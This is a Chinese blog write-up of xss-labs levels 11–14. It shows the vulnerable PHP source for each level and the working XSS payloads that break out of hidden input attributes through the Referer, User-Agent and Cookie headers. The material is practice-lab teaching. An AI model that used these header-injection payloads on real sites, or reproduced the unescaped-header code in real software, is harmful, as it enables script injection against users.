xss-labs-游戏闯关11-

Posted 2021-03-14 delongzhang

level 11-13

<input name="t_link"  value="" type="hidden">
<input name="t_history"  value="" type="hidden">
<input name="t_sort"  value="" type="hidden">
<input name="t_ref"  value="http://web-labs.rinue.top/xss-labs/level10.php?keyword=1&t_link=1&t_history=1&t_sort=%22%20%20onmouseover=%22alert(%27xss%27)%20//" type="hidden">

同样有隐藏的input标签；

keyword=test&t_link=test&t_history=test&t_sort=test&t_ref=test

<input name="t_link"  value="" type="hidden">
<input name="t_history"  value="" type="hidden">
<input name="t_sort"  value="test" type="hidden">
<input name="t_ref"  value="" type="hidden">

<input name="t_sort"  value="&quot; onmouseover=alert(‘xss‘) " type="hidden">

双引号被转为实体类型了；

" onmouseover=alert(‘xss‘) 

<input name="t_sort"  value="" type="hidden">

消失了；

后台源码：

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER[‘HTTP_REFERER‘];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".‘<center>
<form id=search>
<input name="t_link"  value="‘.‘" type="hidden">
<input name="t_history"  value="‘.‘" type="hidden">
<input name="t_sort"  value="‘.htmlspecialchars($str00).‘" type="hidden">
<input name="t_ref"  value="‘.$str33.‘" type="hidden">
</form>
</center>‘;
？>

考虑更改referer的值：在refer中加入弹窗语句；

Referer: " onmouseover=alert(‘xss‘) type="text"

Referer:更改是通过Burpsuit 来更改的；

 

 

level 12

<input name="t_link"  value="" type="hidden">
<input name="t_history"  value="" type="hidden">
<input name="t_sort"  value="" type="hidden">
<input name="t_ua"  value="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" type="hidden">

根据上一题：

更改User-Agent

User-Agent: " onmouseover=alert(‘xss‘) type="text"

 

 

 后台源码:

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER[‘HTTP_USER_AGENT‘];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".‘<center>
<form id=search>
<input name="t_link"  value="‘.‘" type="hidden">
<input name="t_history"  value="‘.‘" type="hidden">
<input name="t_sort"  value="‘.htmlspecialchars($str00).‘" type="hidden">
<input name="t_ua"  value="‘.$str33.‘" type="hidden">
</form>
</center>‘;
?>

 

level13

 

 

<input name="t_link"  value="" type="hidden">
<input name="t_history"  value="" type="hidden">
<input name="t_sort"  value="" type="hidden">
<input name="t_cook"  value="call me maybe?" type="hidden">

 

猜测是cookie；

GET /xss-labs/level13.php?keyword=good%20job!&t_cook=%3Cscript%3Ealert()%3C/script%3E HTTP/1.1
Host: web-labs.rinue.top
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: user=call+me+maybe%3F
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Cookie: user=" type="text" onmouseover=alert(‘xss‘) //

 

 后台源码:

<?php 
setcookie("user", "call me maybe?", time()+3600);
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".‘<center>
<form id=search>
<input name="t_link"  value="‘.‘" type="hidden">
<input name="t_history"  value="‘.‘" type="hidden">
<input name="t_sort"  value="‘.htmlspecialchars($str00).‘" type="hidden">
<input name="t_cook"  value="‘.$str33.‘" type="hidden">
</form>
</center>‘;
?>

level14

 

 发现了这个，

<iframe name="leftframe" marginwidth=10 marginheight=10 src="http://www.exifviewer.org/" frameborder=no width="80%" scrolling="no" height=80%></iframe>

　　查看源码发现内嵌了一个网站；

 

 额，这个页面似乎打不开；

可交换图像文件格式（英语：Exchangeable image file format，官方简称Exif），是专门为数码相机的照片设定的，可以记录数码照片的属性信息和拍摄数据。

EXFI xss

可参照:https://xz.aliyun.com/t/1206?accounttraceid=74ab404d-2a01-4a1c-8b87-36ad367dbe11#toc-12